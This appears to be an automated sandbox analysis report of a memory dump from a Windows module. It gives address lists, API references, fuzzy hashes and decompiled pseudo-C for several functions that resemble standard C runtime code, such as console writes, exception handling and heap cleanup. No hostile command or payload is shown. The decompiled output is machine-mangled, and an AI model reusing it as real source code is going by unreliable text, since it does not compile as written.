0x6e20ea6e
0x6e20ea71
0x6e20ea74
0x6e20ea74
0x6e20ea84
0x6e20ea92
0x6e20ea97
0x6e20ea9e
0x6e20eaa0
0x00000000
0x6e20eaa6
0x6e20eaac
0x6e20eab2
0x6e20eab9
0x6e20eabf
0x6e20eac2
0x6e20eac8
0x6e20ead5
0x6e20eadc
0x6e20eae1
0x6e20eae4
0x6e20eae6
0x6e20ed3f
0x6e20ed45
0x6e20ed46
0x6e20ed47
0x6e20ed48
0x6e20ed49
0x6e20ed4a
0x6e20ed4f
0x6e20ed50
0x6e20ed5b
0x6e20ed63
0x6e20ed69
0x6e20ed6c
0x6e20ed71
0x6e20eaec
0x6e20eaec
0x6e20eafa
0x6e20eafd
0x6e20eb18
0x6e20eb1f
0x6e20eb25
0x6e20eb2b
0x6e20eaff
0x6e20eaff
0x6e20eb07
0x00000000
0x6e20eb09
0x6e20eb09
0x6e20eb0f
0x6e20eb0f
0x6e20eb07
0x6e20eb32
0x6e20eb35
0x6e20ec52
0x6e20ec55
0x6e20ec62
0x6e20ec65
0x6e20ec6d
0x6e20ec6d
0x6e20ec57
0x6e20ec5d
0x6e20ec5d
0x6e20eb3b
0x6e20eb3b
0x6e20eb41
0x6e20eb49
0x6e20eb4b
0x6e20eb4e
0x6e20eb57
0x6e20eb60
0x6e20eb66
0x6e20eb66
0x6e20eb69
0x6e20eb6b
0x00000000
0x00000000
0x6e20eb6d
0x6e20eb73
0x6e20eb74
0x6e20eb7f
0x6e20eb87
0x6e20eb8f
0x6e20eb92
0x6e20eb95
0x6e20eb9b
0x6e20eba1
0x6e20eba7
0x6e20ebad
0x6e20ebb0
0x00000000
0x00000000
0x6e20ebb2
0x6e20ebd7
0x6e20ebd7
0x6e20ebda
0x6e20ebde
0x6e20ebf7
0x6e20ebfc
0x6e20ebff
0x6e20ec01
0x6e20ec07
0x6e20ec42
0x6e20ec09
0x6e20ec09
0x6e20ec0e
0x6e20ec16
0x6e20ec17
0x6e20ec17
0x6e20ec2e
0x6e20ec35
0x6e20ec38
0x6e20ec3d
0x6e20ec3d
0x6e20ec45
0x6e20ec48
0x6e20ec48
0x6e20ec4d
0x00000000
0x6e20ec4d
0x6e20ebb4
0x6e20ebb6
0x6e20ebbb
0x6e20ebc1
0x6e20ebca
0x6e20ebd3
0x6e20ebd3
0x00000000
0x6e20ebb6
0x6e20ec70
0x6e20ec70
0x6e20ec74
0x6e20ec7c
0x6e20ec82
0x6e20ec85
0x6e20ec8b
0x6e20ec8d
0x6e20eccd
0x6e20ecd3
0x6e20ecda
0x6e20ecda
0x6e20ece0
0x6e20ece4
0x00000000
0x6e20ece6
0x6e20ece6
0x6e20ecea
0x6e20ecef
0x6e20ecf3
0x6e20ecf8
0x6e20ecff
0x6e20ed0d
0x6e20ed13
0x6e20ed16
0x6e20ed16
0x6e20ece4
0x6e20ed25
0x6e20ed2d
0x6e20ed36
0x6e20ec8f
0x6e20ec95
0x6e20ec98
0x6e20ec9f
0x6e20ecb1
0x6e20ecb8
0x6e20ecc5
0x00000000
0x6e20ecc5
0x00000000
0x6e20ec8d
0x6e20eae6
0x6e20ea61
0x00000000
0x6e20ea61
0x00000000
0x6e20ea5f
0x6e20ea58
0x6e20ea5a
0x6e20ea5a
0x00000000
0x6e20e9e4
0x6e20e9e4
0x6e20e9e4
0x6e20e9e6
0x6e20e9ea
0x6e20e9eb
0x6e20e9f6
0x6e20e9f6
0x6e20e80d
0x6e20e80d
0x6e20e810
0x6e20e815
0x6e20e972
0x00000000
0x6e20e81b
0x6e20e81d
0x6e20e825
0x6e20e82b
0x6e20e82c
0x6e20e832
0x6e20e833
0x6e20e838
0x6e20e83b
0x6e20e83d
0x6e20e843
0x6e20e845
0x6e20e846
0x6e20e846
0x6e20e854
0x6e20e854
0x6e20e857
0x6e20e859
0x6e20e85c
0x6e20e86a
0x6e20e86a
0x6e20e954
0x6e20e954
0x00000000
0x6e20e956
0x6e20e956
0x00000000
0x6e20e85e
0x6e20e85e
0x6e20e861
0x6e20e864
0x00000000
0x00000000
0x00000000
0x00000000
0x6e20e864
0x6e20e85c
0x6e20e815
0x6e20e807
0x6e20e7da
0x6e20e7dc
0x6e20e7dd
0x6e20e7e0
0x00000000
0x00000000
0x00000000
0x00000000
0x6e20e7e0
0x6e20e7d8
0x6e20e760
0x00000000
0x6e20e754
0x00000000
0x6e20e871
0x6e20e727
0x6e20e71c
0x6e20e711
0x6e20e6ca
0x6e20e6ca
0x6e20e6cc
0x6e20e6ce
0x6e20e6cf
0x6e20e6d0
0x6e20e6d1
0x6e20e6d6
0x6e20e961
0x6e20e965
0x6e20e966
0x6e20e971
0x6e20e971
0x6e20e6c8
0x00000000

APIs

Part of subcall function 6E20F26D: RtlAllocateHeap.NTDLL(00000000,6E1C75D9,00000000,?,6E1E0F8B,00000002,00000000,?,?,?,6E1A1298,6E1C75D9,00000004,00000000,00000000,00000000), ref: 6E20F29F

_free.LIBCMT ref: 6E20E611
_free.LIBCMT ref: 6E20E628
_free.LIBCMT ref: 6E20E647
_free.LIBCMT ref: 6E20E662
_free.LIBCMT ref: 6E20E679

Strings

#n, xrefs: 6E20E559

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID: #n
API String ID: 3033488037-925149467
Opcode ID: 2f81099a7197d0b99bc0e47f601abe025e0428cede12dabac87d69d0a56cc3b4
Instruction ID: 20c82b030b8189ffe1d036cc3c03ed7ee8726b33421a92d4597d30def46bcee3
Opcode Fuzzy Hash: 2f81099a7197d0b99bc0e47f601abe025e0428cede12dabac87d69d0a56cc3b4
Instruction Fuzzy Hash: A8510675A1030DAFDB50CFA9D841AAAB7FAEF45725F100969E809DB2D0E731E980CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E212C2B, Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E6E212C2B(void* __ebx, void* __edi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __esi;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t92;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				signed int _t129;
				signed char* _t131;
				intOrPtr* _t132;
				signed int _t133;
				void* _t134;

				_t78 =  *0x6e28506c; // 0x9881d723
				_v8 = _t78 ^ _t133;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t131 = _a12;
				_v52 = _t131;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x6e2876f8 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t131;
				_t86 = GetConsoleCP();
				_t132 = _a4;
				_v60 = _t86;
				 *_t132 = 0;
				 *((intOrPtr*)(_t132 + 4)) = 0;
				 *((intOrPtr*)(_t132 + 8)) = 0;
				while(_t131 < _v40) {
					_v28 = 0;
					_v31 =  *_t131;
					_t129 =  *(0x6e2876f8 + _v48 * 4);
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						_t92 = E6E20367B(_t116, _t129);
						_t129 = 0x8000;
						if(( *(_t92 + ( *_t131 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t131);
							goto L8;
						} else {
							if(_t131 >= _v40) {
								_t129 = _v48;
								 *((char*)( *((intOrPtr*)(0x6e2876f8 + _t129 * 4)) + _t116 + 0x2e)) =  *_t131;
								 *( *((intOrPtr*)(0x6e2876f8 + _t129 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x6e2876f8 + _t129 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 4)) + 1;
							} else {
								_t112 = E6E20CF1B( &_v28, _t131, 2);
								_t134 = _t134 + 0xc;
								if(_t112 != 0xffffffff) {
									_t131 =  &(_t131[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E6E20CF1B();
						_t134 = _t134 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t131 =  &(_t131[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t132 = GetLastError();
								} else {
									 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 8)) - _v52 + _t131;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t132 + 8)) =  *((intOrPtr*)(_t132 + 8)) + 1;
													 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E6E1DF8A5(_v8 ^ _t133, _t129, _t132);
			}

APIs

GetConsoleCP.KERNEL32(00000000,?,?,?,?,?,?,?,?,6E2133A0,?,?,00000000,?,?,?), ref: 6E212C6D
__fassign.LIBCMT ref: 6E212CE8
__fassign.LIBCMT ref: 6E212D03
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000005,00000000,00000000), ref: 6E212D29
WriteFile.KERNEL32(?,00000000,00000000,6E2133A0,00000000,?,?,?,?,?,?,?,?,?,6E2133A0,?), ref: 6E212D48
WriteFile.KERNEL32(?,?,00000001,6E2133A0,00000000,?,?,?,?,?,?,?,?,?,6E2133A0,?), ref: 6E212D81

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 74ff004bb44e5b1714468114b42a2bda59143af8606f92a116811cdd415c799b
Instruction ID: 1a06ea1de8df4813e6822bc28187c410ee213ba68e5235ad8882336130b4ef33
Opcode Fuzzy Hash: 74ff004bb44e5b1714468114b42a2bda59143af8606f92a116811cdd415c799b
Instruction Fuzzy Hash: 1451A6B190460E9FDB00CFA8C885ADEBBF9EF0A310F14455AF955E7281D730DA51DB61

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E3F60, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E6E1E3F60(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				long _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				long _v40;
				signed int _t48;
				char _t51;
				signed int _t58;
				intOrPtr _t59;
				void* _t60;
				intOrPtr* _t61;
				intOrPtr _t63;
				void* _t66;
				long _t68;
				long _t70;
				intOrPtr _t74;
				signed int _t78;
				char _t80;
				intOrPtr _t83;
				intOrPtr _t88;
				intOrPtr _t90;
				intOrPtr _t93;
				long _t95;
				long _t97;
				void* _t98;
				void* _t100;
				void* _t102;
				void* _t104;
				void* _t105;
				void* _t112;

				_t86 = __edx;
				_push(__ebx);
				_t74 = _a8;
				_push(__edi);
				_v5 = 0;
				_t93 = _t74 + 0x10;
				_t48 =  *(_t74 + 8) ^  *0x6e28506c;
				_push(_t93);
				_push(_t48);
				_v16 = 1;
				_v20 = _t93;
				_v12 = _t48;
				E6E1E3F20(_t74, __edx);
				E6E1E5267(_a12);
				_t51 = _a4;
				_t105 = _t104 + 0xc;
				_t90 =  *((intOrPtr*)(_t74 + 0xc));
				if(( *(_t51 + 4) & 0x00000066) != 0) {
					__eflags = _t90 - 0xfffffffe;
					if(_t90 != 0xfffffffe) {
						_t86 = 0xfffffffe;
						E6E1E5920(_t74, 0xfffffffe, _t93, 0x6e28506c);
						goto L14;
					}
					goto L15;
				} else {
					_v32 = _t51;
					_v28 = _a12;
					 *((intOrPtr*)(_t74 - 4)) =  &_v32;
					if(_t90 == 0xfffffffe) {
						L15:
						return _v16;
					} else {
						do {
							_t78 = _v12;
							_t20 = _t90 + 2; // 0x3
							_t58 = _t90 + _t20 * 2;
							_t74 =  *((intOrPtr*)(_t78 + _t58 * 4));
							_t59 = _t78 + _t58 * 4;
							_t79 =  *((intOrPtr*)(_t59 + 4));
							_v24 = _t59;
							if( *((intOrPtr*)(_t59 + 4)) == 0) {
								_t80 = _v5;
								goto L8;
							} else {
								_t86 = _t93;
								_t60 = E6E1E58D0(_t79, _t93);
								_t80 = 1;
								_v5 = 1;
								_t112 = _t60;
								if(_t112 < 0) {
									_v16 = 0;
									L14:
									_push(_t93);
									_push(_v12);
									E6E1E3F20(_t74, _t86);
									goto L15;
								} else {
									if(_t112 > 0) {
										_t61 = _a4;
										__eflags =  *_t61 - 0xe06d7363;
										if( *_t61 == 0xe06d7363) {
											__eflags =  *0x6e22e698;
											if(__eflags != 0) {
												_t70 = E6E227400(__eflags, 0x6e22e698);
												_t105 = _t105 + 4;
												__eflags = _t70;
												if(_t70 != 0) {
													_t97 =  *0x6e22e698; // 0x6e1e3b1a
													 *0x6e22a26c(_a4, 1);
													 *_t97();
													_t93 = _v20;
													_t105 = _t105 + 8;
												}
												_t61 = _a4;
											}
										}
										_t87 = _t61;
										E6E1E5904(_t61, _a8, _t61);
										_t63 = _a8;
										__eflags =  *((intOrPtr*)(_t63 + 0xc)) - _t90;
										if( *((intOrPtr*)(_t63 + 0xc)) != _t90) {
											_t87 = _t90;
											E6E1E5920(_t63, _t90, _t93, 0x6e28506c);
											_t63 = _a8;
										}
										_push(_t93);
										_push(_v16);
										 *((intOrPtr*)(_t63 + 0xc)) = _t74;
										E6E1E3F20(_t74, _t87);
										_t88 = _t93;
										_t83 =  *((intOrPtr*)(_v28 + 8));
										E6E1E58E8();
										asm("int3");
										_t100 = _t98;
										_t102 = _t100;
										_push(_t102);
										_push(_t93);
										_t95 = _v40;
										__eflags = _t95 - 0xffffffe0;
										if(_t95 > 0xffffffe0) {
											L32:
											 *((intOrPtr*)(E6E202281())) = 0xc;
											_t66 = 0;
											__eflags = 0;
										} else {
											__eflags = _t95;
											if(_t95 == 0) {
												_t95 = _t95 + 1;
											}
											while(1) {
												_t66 = RtlAllocateHeap( *0x6e287b04, 0, _t95); // executed
												__eflags = _t66;
												if(_t66 != 0) {
													break;
												}
												__eflags = E6E21BEB2();
												if(__eflags == 0) {
													goto L32;
												} else {
													_t68 = E6E209256(_t74, _t83, _t88, _t90, __eflags, _t95);
													_pop(_t83);
													__eflags = _t68;
													if(_t68 == 0) {
														goto L32;
													} else {
														continue;
													}
												}
												goto L33;
											}
										}
										L33:
										return _t66;
									} else {
										goto L8;
									}
								}
							}
							goto L34;
							L8:
							_t90 = _t74;
						} while (_t74 != 0xfffffffe);
						if(_t80 != 0) {
							goto L14;
						}
						goto L15;
					}
				}
				L34:
			}

APIs

_ValidateLocalCookies.LIBCMT ref: 6E1E3F8B
___except_validate_context_record.LIBVCRUNTIME ref: 6E1E3F93
_ValidateLocalCookies.LIBCMT ref: 6E1E4021
__IsNonwritableInCurrentImage.LIBCMT ref: 6E1E404C
_ValidateLocalCookies.LIBCMT ref: 6E1E40A1

Strings

csm, xrefs: 6E1E4036

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: c6d3dff157a71dbcc2c54bb81fcbd19c58129389197c44339c49d14aa92eba58
Instruction ID: f43d5cafab773b556b1020f533bae03a97185ebd41a838ff66daa9ac4055631e
Opcode Fuzzy Hash: c6d3dff157a71dbcc2c54bb81fcbd19c58129389197c44339c49d14aa92eba58
Instruction Fuzzy Hash: B341E134A00A09AFCF04DFA8C844AEE7BF9AF45328F108565F8155B792D731AD82DB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E21D29B, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E21D29B(intOrPtr _a4) {
				void* _t18;
				intOrPtr _t45;

				_t45 = _a4;
				if(_t45 != 0) {
					E6E21CF81(_t45, 7);
					_t2 = _t45 + 0x1c; // 0x1c
					E6E21CF81(_t2, 7);
					_t3 = _t45 + 0x38; // 0x38
					E6E21CF81(_t3, 0xc);
					_t4 = _t45 + 0x68; // 0x68
					E6E21CF81(_t4, 0xc);
					_t5 = _t45 + 0x98; // 0x98
					E6E21CF81(_t5, 2);
					E6E20CBD3( *((intOrPtr*)(_t45 + 0xa0)));
					E6E20CBD3( *((intOrPtr*)(_t45 + 0xa4)));
					E6E20CBD3( *((intOrPtr*)(_t45 + 0xa8)));
					_t9 = _t45 + 0xb4; // 0xb4
					E6E21CF81(_t9, 7);
					_t10 = _t45 + 0xd0; // 0xd0
					E6E21CF81(_t10, 7);
					_t11 = _t45 + 0xec; // 0xec
					E6E21CF81(_t11, 0xc);
					_t12 = _t45 + 0x11c; // 0x11c
					E6E21CF81(_t12, 0xc);
					_t13 = _t45 + 0x14c; // 0x14c
					E6E21CF81(_t13, 2);
					E6E20CBD3( *((intOrPtr*)(_t45 + 0x154)));
					E6E20CBD3( *((intOrPtr*)(_t45 + 0x158)));
					E6E20CBD3( *((intOrPtr*)(_t45 + 0x15c)));
					return E6E20CBD3( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

APIs

Part of subcall function 6E21CF81: _free.LIBCMT ref: 6E21CFAA

_free.LIBCMT ref: 6E21D2E9

Part of subcall function 6E20CBD3: HeapFree.KERNEL32(00000000,00000000,?,6E21CFAF,00000000,00000000,00000000,00000000,?,6E21D2B4,00000000,00000007,00000000,?,6E21C0FC,00000000), ref: 6E20CBE9
Part of subcall function 6E20CBD3: GetLastError.KERNEL32(00000000,?,6E21CFAF,00000000,00000000,00000000,00000000,?,6E21D2B4,00000000,00000007,00000000,?,6E21C0FC,00000000,00000000), ref: 6E20CBFB

_free.LIBCMT ref: 6E21D2F4
_free.LIBCMT ref: 6E21D2FF
_free.LIBCMT ref: 6E21D353
_free.LIBCMT ref: 6E21D35E
_free.LIBCMT ref: 6E21D369
_free.LIBCMT ref: 6E21D374

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 60696fea0fb7a8f1018e7d39f05bb92555332742b445cba9cf2dcfb68d68d62d
Instruction ID: de23213db884c6b6085ab85b17c8d5dced45a5f536ba1953d34a3735d1927f53
Opcode Fuzzy Hash: 60696fea0fb7a8f1018e7d39f05bb92555332742b445cba9cf2dcfb68d68d62d
Instruction Fuzzy Hash: 1C115479948B4CABD620A7F0CC47FCBB7EE9F04B04F504D36A39A6E0A1D775B6044651

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CEF91, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E1CEF91(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t307;
				signed int _t308;
				void* _t320;
				void* _t333;
				void* _t346;
				void* _t359;
				void* _t372;
				void* _t385;
				void* _t398;
				void* _t411;
				void* _t424;
				void* _t437;
				void* _t450;
				void* _t463;
				void* _t476;
				void* _t489;
				void* _t502;
				void* _t515;
				void* _t528;
				void* _t541;
				void* _t554;
				void* _t567;
				signed int _t815;
				signed int _t882;
				signed int _t883;
				signed int _t884;
				signed int _t885;
				signed int _t886;
				signed int _t887;
				signed int _t888;
				signed int _t889;
				signed int _t890;
				signed int _t891;
				signed int _t892;
				signed int _t893;
				signed int _t894;
				signed int _t895;
				signed int _t896;
				signed int _t897;
				signed int _t898;
				signed int _t899;
				signed int _t900;
				signed int _t901;
				signed int _t903;
				signed int _t904;
				signed int _t905;
				signed int _t906;
				signed int _t907;
				signed int _t908;
				signed int _t909;
				signed int _t910;
				signed int _t911;
				signed int _t912;
				signed int _t913;
				signed int _t914;
				signed int _t915;
				signed int _t916;
				signed int _t917;
				signed int _t918;
				signed int _t919;
				signed int _t920;
				signed int _t921;
				signed int _t922;
				signed int _t923;
				signed int _t924;
				void* _t946;

				_t879 = __edx;
				_t668 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t946 - 0x14, 0);
				_t903 =  *0x6e286de4; // 0x0
				 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
				 *(_t946 - 0x10) = _t903;
				_t307 = E6E1A161C(0x6e286d90);
				_t671 =  *((intOrPtr*)(_t946 + 8));
				_t308 = E6E1A171B( *((intOrPtr*)(_t946 + 8)), _t307);
				_t881 = _t308;
				if(_t308 != 0) {
					L5:
					E6E1C66BA(_t946 - 0x14);
					return E6E1E0075(_t881);
				} else {
					if(_t903 == 0) {
						_push( *((intOrPtr*)(_t946 + 8)));
						_push(_t946 - 0x10);
						__eflags = E6E1D0D03(__ebx, _t671, __edx, _t881, _t903) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t946 - 0x20);
							E6E1E3D74(_t946 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t881, _t903, 0x14);
							E6E1C6653(_t946 - 0x14, 0);
							_t904 =  *0x6e286db4; // 0x0
							 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
							 *(_t946 - 0x10) = _t904;
							_t320 = E6E1A161C(0x6e286d68);
							_t678 =  *((intOrPtr*)(_t946 + 8));
							_t882 = E6E1A171B( *((intOrPtr*)(_t946 + 8)), _t320);
							__eflags = _t882;
							if(_t882 != 0) {
								L12:
								E6E1C66BA(_t946 - 0x14);
								return E6E1E0075(_t882);
							} else {
								__eflags = _t904;
								if(_t904 == 0) {
									_push( *((intOrPtr*)(_t946 + 8)));
									_push(_t946 - 0x10);
									__eflags = E6E1D0DA5(_t668, _t678, __edx, _t882, _t904) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t946 - 0x20);
										E6E1E3D74(_t946 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t668, _t882, _t904, 0x14);
										E6E1C6653(_t946 - 0x14, 0);
										_t905 =  *0x6e286dd4; // 0x0
										 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
										 *(_t946 - 0x10) = _t905;
										_t333 = E6E1A161C(0x6e286b28);
										_t685 =  *((intOrPtr*)(_t946 + 8));
										_t883 = E6E1A171B( *((intOrPtr*)(_t946 + 8)), _t333);
										__eflags = _t883;
										if(_t883 != 0) {
											L19:
											E6E1C66BA(_t946 - 0x14);
											return E6E1E0075(_t883);
										} else {
											__eflags = _t905;
											if(_t905 == 0) {
												_push( *((intOrPtr*)(_t946 + 8)));
												_push(_t946 - 0x10);
												__eflags = E6E1D0E47(_t668, _t685, __edx, _t883, _t905) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t946 - 0x20);
													E6E1E3D74(_t946 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t668, _t883, _t905, 0x14);
													E6E1C6653(_t946 - 0x14, 0);
													_t906 =  *0x6e286de8; // 0x0
													 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
													 *(_t946 - 0x10) = _t906;
													_t346 = E6E1A161C(0x6e286d94);
													_t692 =  *((intOrPtr*)(_t946 + 8));
													_t884 = E6E1A171B( *((intOrPtr*)(_t946 + 8)), _t346);
													__eflags = _t884;
													if(_t884 != 0) {
														L26:
														E6E1C66BA(_t946 - 0x14);
														return E6E1E0075(_t884);
													} else {
														__eflags = _t906;
														if(_t906 == 0) {
															_push( *((intOrPtr*)(_t946 + 8)));
															_push(_t946 - 0x10);
															__eflags = E6E1D0EB7(_t668, _t692, _t879, _t884, _t906) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t946 - 0x20);
																E6E1E3D74(_t946 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t668, _t884, _t906, 0x14);
																E6E1C6653(_t946 - 0x14, 0);
																_t907 =  *0x6e286db8; // 0x0
																 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																 *(_t946 - 0x10) = _t907;
																_t359 = E6E1A161C(0x6e286d6c);
																_t699 =  *((intOrPtr*)(_t946 + 8));
																_t885 = E6E1A171B( *((intOrPtr*)(_t946 + 8)), _t359);
																__eflags = _t885;
																if(_t885 != 0) {
																	L33:
																	E6E1C66BA(_t946 - 0x14);
																	return E6E1E0075(_t885);
																} else {
																	__eflags = _t907;
																	if(_t907 == 0) {
																		_push( *((intOrPtr*)(_t946 + 8)));
																		_push(_t946 - 0x10);
																		__eflags = E6E1D0F1F(_t668, _t699, _t879, _t885, _t907) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t946 - 0x20);
																			E6E1E3D74(_t946 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t668, _t885, _t907, 0x14);
																			E6E1C6653(_t946 - 0x14, 0);
																			_t908 =  *0x6e286dec; // 0x0
																			 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																			 *(_t946 - 0x10) = _t908;
																			_t372 = E6E1A161C(0x6e286d98);
																			_t706 =  *((intOrPtr*)(_t946 + 8));
																			_t886 = E6E1A171B( *((intOrPtr*)(_t946 + 8)), _t372);
																			__eflags = _t886;
																			if(_t886 != 0) {
																				L40:
																				E6E1C66BA(_t946 - 0x14);
																				return E6E1E0075(_t886);
																			} else {
																				__eflags = _t908;
																				if(_t908 == 0) {
																					_push( *((intOrPtr*)(_t946 + 8)));
																					_push(_t946 - 0x10);
																					__eflags = E6E1D0F87(_t668, _t706, _t879, _t886, _t908) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1A1438(_t946 - 0x20);
																						E6E1E3D74(_t946 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e2283cf, _t668, _t886, _t908, 0x14);
																						E6E1C6653(_t946 - 0x14, 0);
																						_t909 =  *0x6e286dbc; // 0x0
																						 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																						 *(_t946 - 0x10) = _t909;
																						_t385 = E6E1A161C(0x6e286d70);
																						_t713 =  *((intOrPtr*)(_t946 + 8));
																						_t887 = E6E1A171B( *((intOrPtr*)(_t946 + 8)), _t385);
																						__eflags = _t887;
																						if(_t887 != 0) {
																							L47:
																							E6E1C66BA(_t946 - 0x14);
																							return E6E1E0075(_t887);
																						} else {
																							__eflags = _t909;
																							if(_t909 == 0) {
																								_push( *((intOrPtr*)(_t946 + 8)));
																								_push(_t946 - 0x10);
																								__eflags = E6E1D0FEF(_t668, _t713, _t879, _t887, _t909) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1A1438(_t946 - 0x20);
																									E6E1E3D74(_t946 - 0x20, 0x6e283504);
																									asm("int3");
																									E6E1E00AC(0x6e2283cf, _t668, _t887, _t909, 0x14);
																									E6E1C6653(_t946 - 0x14, 0);
